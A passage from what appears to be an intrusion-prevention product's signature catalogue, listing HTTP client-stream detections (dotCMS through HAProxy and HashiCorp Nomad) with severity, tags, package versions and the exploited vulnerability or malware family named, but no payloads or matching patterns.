Tags: Windows, Linux, Any Hardware, dotCMS, CVE2022, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: Dotcms-RCE-Via-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-DrayTek-Vigor-Command-Execution-CVE-2020-15415

About this situation: An attempt to exploit a vulnerability in DrayTek Vigor detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, DrayTek Vigor, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Vulnerability: DrayTek-Vigor-Command-Execution-CVE-2020-15415
Description:
Back to top

HTTP_CS-Dreamloader-Bot-Traffic

About this situation: Dreamloader Bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Dreamloader-Bot
Description:
Back to top

HTTP_CS-Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Drupal Core detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1153-5242
Last changed: sgpkg-ips-1153-5242
Vulnerability: Drupal-Core-File_Create_Filename-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Drupal-Core-XML-RPC-Endpoint-Internal-Entity-Expansion-Denial-Of-Service
Description:
Back to top

HTTP_CS-Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow

About this situation: An Easy File Sharing HTTP Server POST Buffer Overflow vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Easy File Sharing HTTP Server, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow
Description:
Back to top

HTTP_CS-Eaton-Intelligent-Power-Manager-System-Command-Injection

About this situation: An attempt to exploit a vulnerability in Eaton Intelligent Power Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Intelligent Power Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Eaton-Intelligent-Power-Manager-System-Command-Injection
Description:
Back to top

HTTP_CS-Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection

About this situation: An Eir D1000 Wireless Router WAN Side Remote Command Injection vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection
Description:
Back to top

HTTP_CS-elFinder-PHP-Connector-Exiftran-Command-Injection

About this situation: An attempt to exploit a vulnerability in elFinder detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, elFinder, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1198-5242
Vulnerability: elFinder-PHP-Connector-Exiftran-Command-Injection
Description:
Back to top

HTTP_CS-Elog-Web-Logbook-BOF

About this situation: Attempt to exploit a buffer overflow in Elog Web Logbook
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Elog Web Logbook, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1618-5242
Vulnerability: Elog-Web-Logbook-BOF
Description:
Back to top

HTTP_CS-Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: Embedthis-GoAhead-Parseheaders-Out-Of-Bounds-Read
Description:
Back to top

HTTP_CS-Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead Web Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Vulnerability: Embedthis-GoAhead-Web-Server-CVE-2021-42342-Cgi-RCE
Description:
Back to top

HTTP_CS-Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1220-5242
Vulnerability: Embedthis-GoAhead-Web-Server-File-Upload-Use-After-Free
Description:
Back to top

HTTP_CS-EMC-Cmcne-Fileuploadcontroller-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: EMC-Cmcne-Fileuploadcontroller-Information-Disclosure
Description:
Back to top

HTTP_CS-EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: EMC-Cmcne-Inmservlets.war-Fileuploadcontroller-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-EMC-Data-Protection-Advisor-Application-Service-Static-Credentials-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in EMC Data Protection Advisor detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Data Protection Advisor, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: EMC-Data-Protection-Advisor-Static-Credentials-Authentication-Bypass
Description:
Back to top

HTTP_CS-Emotet-Malware-Infection-Traffic

About this situation: Emotet malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1277-5242
Vulnerability: Emotet-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-ENC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: EMC-Cmcne-Fileuploadcontroller-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in EnterpriseDT CompleteFTP Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EnterpriseDT CompleteFTP Server, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Enterprisedt-Completeftp-Server-Httpfile-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CS-Esignal-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Interactive Data eSignal detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Interactive Data eSignal, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-506-5211
Vulnerability: Esignal-Buffer-Overflow
Description:
Back to top

HTTP_CS-Excessively-Long-Asp-Include-File-Argument

About this situation: Detects an excessively long ASP include file argument
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, IIS, MS2006-07, CVE2006, Windows not specific, IIS not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-IIS-Server-Crafted-Asp-Page-Buffer-Overflow
Description:
Back to top

HTTP_CS-Excessively-Long-Request-Version-Field

About this situation: An excessively long version field in HTTP request detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-359-4219
Vulnerability: Oracle-Bea-WebLogic-Server-Apache-Connector-HTTP-Version-String-Buffer-Overflow
Description:
Back to top

HTTP_CS-Executor-Backdoor

About this situation: Executor backdoor access
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Executor
Description:
Back to top

HTTP_CS-F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator

About this situation: An attempt to exploit a vulnerability in F5 Big-IP's iControl detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, F5 Networks BIG-IP, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator
Description:
Back to top

HTTP_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, F5 Networks BIG-IP Edge Gateway, F5 Networks BIG-IP Link Controller, F5 Networks BIG-IP WebAccelerator, F5 Networks BIG-IQ Cloud, F5 Networks BIG-IQ Device, F5 Networks BIG-IQ Security, F5 Networks Enterprise Manager, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1401-5242
Vulnerability: F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
Description:
Back to top

HTTP_CS-File-Sharing-Wizard-POST-SEH-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in File Sharing Wizard detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, File Sharing Wizard, CVE2019, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: File-Sharing-Wizard-POST-SEH-Buffer-Overflow
Description:
Back to top

HTTP_CS-Fivetoon-Activity

About this situation: Possible Fivetoon activity detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Fivetoon
Description:
Back to top

HTTP_CS-Foreman-Bookmarks-Creation-Remote-Code-Injection

About this situation: An attack against Foreman detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Foreman, CVE2013, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-597-5211
Vulnerability: Foreman-Bookmarks-Creation-Remote-Code-Injection
Description:
Back to top

HTTP_CS-Formbook-Malware-Infection-Traffic

About this situation: Formbook malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1413-5242
Vulnerability: Formbook-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-FortiLogger-Arbitrary-File-Upload-Exploit

About this situation: An attempt to exploit a vulnerability in FortiLogger detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows 10.0, Any Hardware, FortiLogger, CVE2021, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: FortiLogger-Arbitrary-File-Upload-Exploit
Description:
Back to top

HTTP_CS-Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952

About this situation: An attempt to exploit a vulnerability in Fortinet FortiNAC detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiNAC, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Fortinet-Fortinac-Arbitrary-File-Write-CVE-2022-39952
Description:
Back to top

HTTP_CS-Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567

About this situation: An attempt to exploit a vulnerability in Fortinet FortiWeb
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiWeb, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Fortinet-Fortiweb-Cgi_Grpc_IDL_File_Post-Command-Injection-CVE-2024-50567
Description:
Back to top

HTTP_CS-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiOS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Vulnerability: Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
Description:
Back to top

HTTP_CS-FreePBX-Recording-Interface-File-Upload-Code-Execution

About this situation: An attempt to exploit a vulnerability in FreePBX detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: FreePBX-Recording-Interface-File-Upload-Code-Execution
Description:
Back to top

HTTP_CS-Froxlor-Log-Path-RCE

About this situation: An attempt to exploit a vulnerability in Froxlor detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Froxlor, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1567-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Froxlor-Log-Path-RCE
Description:
Back to top

HTTP_CS-FusionPBX-Fax-Server-Fax_Send-Command-Injection

About this situation: An attempt to exploit a vulnerability in FusionPBX detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, FusionPBX, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: FusionPBX-Fax-Server-Fax_Send-Command-Injection
Description:
Back to top

HTTP_CS-GENESIS32-And-GENESIS64-GenBroker.exe-DoS

About this situation: A vulnerability Genesis32 and Genesis64 GenBroker that allows for a DoS
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Genesis HTTP server, Windows not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: GENESIS32-And-GENESIS64-GenBroker.exe-DoS
Description:
Back to top

HTTP_CS-Gh0st-C2-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Gh0st C2 Server detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: Gh0st-C2-Server-Buffer-Overflow
Description:
Back to top

HTTP_CS-Gila-CMS-Media-assets.php-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Gila CMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Gila CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: Gila-CMS-Media-assets.php-Path-Traversal
Description:
Back to top

HTTP_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Git Source Code Management detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
Description:
Back to top

HTTP_CS-Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Gitlab-File-Read-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in GitLab detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Gitlab-File-Read-Remote-Code-Execution
Description:
Back to top

HTTP_CS-GLPI-Rest-API-User_Token-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1528-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: GLPI-Rest-API-User_Token-SQL-Injection
Description:
Back to top

HTTP_CS-GoAhead-Deep-Directory-BOF

About this situation: Detects exploits against GoAhead webserver
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, GoAhead Webserver, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-1618-5242
Vulnerability: HTTP_GoAhead-Webserver-Deep-Path-Buffer-Overflow
Description:
Back to top

HTTP_CS-Gozi-Malware-Infection-Traffic

About this situation: Gozi malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Vulnerability: Gozi-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution

About this situation: An attempt to exploit a vulnerability in Grandstream GXV31XX IP multimedia phones detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grandstream, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Grandstream-GXV31XX-Settimezone-Unauthenticated-Command-Execution
Description:
Back to top

HTTP_CS-Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE

About this situation: An attempt to exploit a vulnerability in Grandstream UCM62xx IP PBX devices detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grandstream, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Grandstream-UCM62xx-IP-PBX-SendPasswordEmail-RCE
Description:
Back to top

HTTP_CS-Grav-CMS-Page-Media-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Grav Grav CMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grav CMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Grav-CMS-Page-Media-Upload-Directory-Traversal
Description:
Back to top

HTTP_CS-GuLoader-Malware-Infection-Traffic

About this situation: GuLoader malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1271-5242
Vulnerability: GuLoader-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Gumblar-Bot-Traffic

About this situation: Gumblar bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Gumblar-Bot
Description:
Back to top

HTTP_CS-Haproxy-HTTP2-HPACK-Out-of-Bound-Write

About this situation: An attempt to exploit a vulnerability in HAProxy detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, HAProxy, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Haproxy-HTTP2-HPACK-Out-of-Bound-Write
Description:
Back to top

HTTP_CS-Hashicorp-Nomad-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in HashiCorp Nomad detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, HashiCorp Nomad, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Hashicorp-Nomad-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Head-Slash-Host

About this situation: Attempt to exploit a buffer overflow by sending lots of headers
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
